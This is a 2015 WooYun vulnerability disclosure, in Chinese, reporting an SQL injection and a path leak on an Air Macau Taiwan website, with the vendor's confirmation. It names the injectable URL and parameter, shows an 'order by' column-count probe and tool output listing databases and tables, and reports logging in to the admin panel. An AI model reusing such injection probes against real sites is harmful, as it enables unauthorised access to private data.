当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099239

漏洞标题:澳门航空某站又一处SQL注入漏洞成功登录后台+敏感信息泄露

相关厂商:澳门航空

漏洞作者: goubuli

提交时间:2015-03-03 19:12

修复时间:2015-04-17 19:14

公开时间:2015-04-17 19:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-08: 厂商已经确认,细节仅向厂商公开
2015-03-18: 细节向核心白帽子及相关领域专家公开
2015-03-28: 细节向普通白帽子公开
2015-04-07: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

RT

详细说明:

漏洞一、SQL注入
之前挖了澳门航空的多个注入漏洞
见: WooYun: 澳门航空某站SQL注入漏洞(明文密码)WooYun: 澳门航空某站4处SQL注入漏洞
今天又发现了一处新的SQL注入漏洞。。。
注入URL:http://www.airmacau.com.tw/ffp/ffp_articles.asp?id=6
参数id存在注入。
字段个数判断:http://www.airmacau.com.tw/ffp/ffp_articles.asp?id=6 order by 14
如图

150303——1.png


其他手工操作同上一个注入: WooYun: 澳门航空某站SQL注入漏洞(明文密码)
这里直接上工具。
跑所有数据库:

150303——2.png


数据库:

available databases [20]:
[*] ctu_Web
[*] hgh_Web
[*] master
[*] model
[*] msdb
[*] nkg_Web
[*] pek_Web
[*] pvg_Web
[*] ReportServer
[*] ReportServerTempDB
[*] s_airmacau
[*] sin_web
[*] szx_Web
[*] tempdb
[*] tpe_web
[*] tw_web_event
[*] tw_web_internal
[*] tw_web_outstation
[*] tw_web_telex
[*] xmn_Web


当前数据库:

current database:    'tpe_web'


150303——4.png


表:

Database: tpe_web
[106 tables]
+-----------------------------+
| CityName |
| NXPress |
| NotesLog |
| ReConfirm |
| co-brand_member |
| advertisement |
| amh_bkk_hotel |
| b2blist |
| bbs_join |
| bbs_main |
| bbs_sub |
| bpbonus |
| cakk_application |
| cargo_booking_adhoc |
| cargo_booking_adhoc |
| cargo_booking_flight_type |
| cargo_booking_flight_type |
| cargo_booking_no_type |
| cargo_marquee |
| cargo_track |
| cgormk |
| cobrand_pw |
| ctcb_application_agent |
| ctcb_application_agent |
| ctcb_ffpno |
| dapo_agent |
| dapo_apply |
| dtest |
| dtproperties |
| eticket_aggregate_free |
| eticket_aggregate_free |
| eticket_aggregate_free |
| eticket_ca |
| eticket_cobrand |
| eticket_compensate |
| eticket_free_product |
| eticket_hotel |
| eticket_magazine |
| eticket_paylink |
| eticket_product |
| eticket_project |
| eticket_reissue |
| eticket_travelfair |
| ffp_partner |
| flight |
| hotel_booking_contact |
| hotel_booking_contact |
| hotel_booking_contact |
| hotel_booking_disney |
| hotel_booking_guarantee_pay |
| hotel_booking_guarantee_pay |
| hotel_booking_hotels |
| hotel_booking_mco |
| hotel_booking_mfmhotel |
| hotel_booking_product |
| hotel_booking_show |
| hotel_booking_tcuser |
| hotel_booking_zaia_show |
| htlbook |
| iataagent |
| iatauser |
| industryfare_lock |
| industryfare_lock |
| key_table |
| khh_ad |
| login_user |
| mco_contect |
| mco_order |
| mco_ticket |
| mileage_transfer |
| newbonus |
| newsps_reporter |
| newsps_reporter |
| offers |
| online_payment |
| pr_check |
| pr_control |
| pr_tmp |
| preorder_tmp |
| preorder_tmp |
| realtime_timetable |
| recruit |
| route_command |
| route_report_link |
| sales_mail_list |
| sales_mail_log |
| shopping_type |
| shopping_type |
| sqlmapoutput |
| sysdiagrams |
| tpm_data_bak |
| tpm_data_bak |
| vinfopackagedetail |
| vinfopackagedetail |
| vinfopackageitems |
| vinfopackagereg |
| vinfopackagetmp |
| vinfouser |
| viplist |
| welfare_bid_detail |
| welfare_bid_detail |
| welfare_hot_join |
| welfare_hot_main |
| welfare_hot_sub |
| welfare_news |
| welfare_vote |
+-----------------------------+


剩余数据不跑了。。。详细数据同前一个漏洞【编号:wooyun-2015-097456】。。。
漏洞二、敏感信息泄露
随意写一个不存在目录名称,直接报错,暴出网站物理路径,如图

150303——3.png


實體路徑	D:\WEB Server\TWN Web\

漏洞证明:

150303——4.png

150303——3.png


成功登录后台:

150303——5.png


150303——7.png


登录成功。。。

150303——6.png


150303——8.png


声明:只是测试,未做任何篡改。。。

修复方案:

1、过滤
2、更改IIS配置

版权声明:转载请注明来源 goubuli@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-08 03:11

厂商回复:

謝謝通報

最新状态:

暂无